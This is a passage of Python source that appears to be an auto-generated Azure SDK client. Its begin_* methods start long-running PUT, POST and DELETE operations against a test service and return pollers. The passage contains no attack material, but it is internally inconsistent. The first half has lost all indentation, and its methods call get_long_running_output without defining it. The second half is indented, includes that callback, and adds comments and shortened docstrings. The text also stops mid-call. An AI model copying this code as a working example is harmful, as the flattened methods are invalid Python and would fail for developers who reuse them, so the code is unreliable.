raw_result = self._put_async_relative_retry_no_status_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry_no_status_payload(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_relative_retry_no_status_payload_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete204_succeeded(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 204 to the initial request, indicating success.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete204_succeeded_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry_no_status(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_relative_retry_no_status_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_no_location(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, without a location
header.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_no_location_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry_no_payload(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_relative_retry_no_payload_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put200_invalid_json(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that is
not a valid json.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put200_invalid_json_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry_invalid_header(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. The endpoint indicated in the Azure-AsyncOperation
header is invalid.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_relative_retry_invalid_header_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry_invalid_json_polling(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_relative_retry_invalid_json_polling_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_retry_invalid_header(self, **kwargs: Any) -> LROPoller[None]:
    """Long running delete request, service returns a 202 to the initial request, receiving a
    response with invalid 'Location' and 'Retry-After' headers.

    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial DELETE and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._delete202_retry_invalid_header_initial(cls=lambda x, y, z: x, **kwargs)
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Final-deserialization callback invoked when polling completes. This
        # operation has no response body, so only the optional ``cls`` response
        # hook sees the final pipeline response.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry_invalid_header(self, **kwargs: Any) -> LROPoller[None]:
    """Long running delete request, service returns a 202 to the initial request. The endpoint
    indicated in the Azure-AsyncOperation header is invalid.

    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial DELETE and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._delete_async_relative_retry_invalid_header_initial(cls=lambda x, y, z: x, **kwargs)
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Final-deserialization callback invoked when polling completes. This
        # operation has no response body, so only the optional ``cls`` response
        # hook sees the final pipeline response.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry_invalid_json_polling(self, **kwargs: Any) -> LROPoller[None]:
    """Long running delete request, service returns a 202 to the initial request. Poll the endpoint
    indicated in the Azure-AsyncOperation header for operation status.

    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial DELETE and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._delete_async_relative_retry_invalid_json_polling_initial(cls=lambda x, y, z: x, **kwargs)
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Final-deserialization callback invoked when polling completes. This
        # operation has no response body, so only the optional ``cls`` response
        # hook sees the final pipeline response.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_retry_invalid_header(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
    """Long running post request, service returns a 202 to the initial request, with invalid
    'Location' and 'Retry-After' headers.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. e.g. "Succeeded".
                },
                "tags": {"str": "str"},  # Optional. Dictionary of :code:`<string>`.
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial POST and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._post202_retry_invalid_header_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Final-deserialization callback invoked when polling completes. This
        # operation has no response body, so only the optional ``cls`` response
        # hook sees the final pipeline response.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry_invalid_header(
    self, product: JSONType = None, **kwargs: Any
) -> LROPoller[None]:
    """Long running post request, service returns a 202 to the initial request, with an entity that
    contains ProvisioningState=’Creating’. The endpoint indicated in the Azure-AsyncOperation
    header is invalid.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. e.g. "Succeeded".
                },
                "tags": {"str": "str"},  # Optional. Dictionary of :code:`<string>`.
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial POST and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._post_async_relative_retry_invalid_header_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Final-deserialization callback invoked when polling completes. This
        # operation has no response body, so only the optional ``cls`` response
        # hook sees the final pipeline response.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output,
        )
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry_invalid_json_polling(
    self, product: JSONType = None, **kwargs: Any
) -> LROPoller[None]:
    """Long running post request, service returns a 202 to the initial request, with an entity that
    contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
    header for operation status.

    :param product: Product to put.
    :type product: JSONType
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
     operation to not poll, or pass in your own initialized polling object for a personal polling
     strategy.
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
     Retry-After header is present.
    :return: An instance of LROPoller that returns None
    :rtype: ~azure.core.polling.LROPoller[None]
    :raises: ~azure.core.exceptions.HttpResponseError

    Example:
        .. code-block:: python

            # JSON input template you can fill out and use as your body input.
            product = {
                "id": "str",  # Optional. Resource Id.
                "location": "str",  # Optional. Resource Location.
                "name": "str",  # Optional. Resource Name.
                "properties": {
                    "provisioningState": "str",  # Optional.
                    "provisioningStateValues": "str"  # Optional. e.g. "Succeeded".
                },
                "tags": {"str": "str"},  # Optional. Dictionary of :code:`<string>`.
                "type": "str"  # Optional. Resource Type.
            }
    """
    content_type = kwargs.pop("content_type", "application/json")  # type: Optional[str]
    polling = kwargs.pop("polling", True)  # type: Union[bool, PollingMethod]
    cls = kwargs.pop("cls", None)  # type: ClsType[None]
    lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
    cont_token = kwargs.pop("continuation_token", None)  # type: Optional[str]
    if cont_token is None:
        # Fresh start: issue the initial POST and keep the raw pipeline
        # response so the poller can drive the long-running operation.
        raw_result = self._post_async_relative_retry_invalid_json_polling_initial(
            product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
        )
        kwargs.pop("error_map", None)

    def get_long_running_output(pipeline_response):
        # Final-deserialization callback invoked when polling completes. This
        # operation has no response body, so only the optional ``cls`` response
        # hook sees the final pipeline response.
        if cls:
            return cls(pipeline_response, None, {})

    if polling is True:
        polling_method = ARMPolling(lro_delay, **kwargs)  # type: PollingMethod
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    if cont_token:
        # Resume a previously started operation from its continuation token.
        return LROPoller.from_continuation_token(
